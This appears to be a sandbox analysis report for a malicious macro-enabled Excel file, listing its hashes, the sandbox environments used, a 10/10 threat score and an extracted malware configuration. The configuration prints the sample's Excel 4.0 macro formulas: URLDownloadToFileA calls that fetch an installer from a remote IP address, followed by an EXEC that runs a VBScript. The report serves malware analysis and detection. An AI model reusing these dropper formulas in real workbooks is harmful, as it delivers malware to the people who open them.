General
-
Target
12f2e24bc4d9ff73c0f29d9bd7d8c0d9
-
Size
6KB
-
Sample
231221-2b2vgadahr
-
MD5
12f2e24bc4d9ff73c0f29d9bd7d8c0d9
-
SHA1
ae55ca49e2a8e059f6ebba8f5a7c77383218d3f0
-
SHA256
a22fc0b0fb5c5382f7c47c8af9824353b6e5ad6c99bf71f01dc3e05223cc8ac7
-
SHA512
64668bf8bdda36a73fd5ddea951ac98da1bf01f0382a3401921207529c1d5298f34c01fbc73b34c60404775233a071d24fbaa2a6a8d0e3d3971358bcb40ff05b
-
SSDEEP
192:NDShuSbbrA2OmmfRG8UhHFBFYuAb98yNqxxL+w:NauEM2w01FYxb98y4xH
Static task
static1
Behavioral task
behavioral1
Sample
12f2e24bc4d9ff73c0f29d9bd7d8c0d9.xlsm
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
12f2e24bc4d9ff73c0f29d9bd7d8c0d9.xlsm
Resource
win10v2004-20231215-en
Malware Config
Extracted
http://46.17.98.187/index.php
http://google.com/index.php
-
formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0)
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0)
=EXEC("wscript C:\zer\spp.vbs")
=HALT()
Targets
-
-
Target
12f2e24bc4d9ff73c0f29d9bd7d8c0d9
-
Score
10/10
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-